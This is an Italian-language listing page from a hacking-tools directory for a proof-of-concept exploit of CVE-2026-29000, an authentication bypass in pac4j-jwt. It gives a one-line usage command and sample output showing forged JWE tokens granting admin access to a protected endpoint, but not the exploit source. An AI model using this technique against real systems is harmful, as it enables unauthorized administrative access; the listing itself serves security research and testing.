Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC — Proof-of-concept exploit per CVE-2026-29000, un bypass dell'autenticazione in pac4j-jwt. Forgia token JWT per ottenere accesso amministrativo agli endpoint protetti. | Kitploit
Strumenti/GitHubGitHub/manbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmanbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc

CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC

Proof-of-concept exploit per CVE-2026-29000, un bypass dell'autenticazione in pac4j-jwt. Forgia token JWT per ottenere accesso amministrativo agli endpoint protetti.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
15 mesi faNon ancora revisionato

CVE-2026-29000 - PoC di Bypass dell'Autenticazione in pac4j-jwt

Nota: Questo non è un mio lavoro originale. Lo conservo qui come riferimento.

Metodologia di lavoro:

root@kitploit:~
python3 exploit.py http://IP:PORT

[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created

[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw
Scarica lo strumento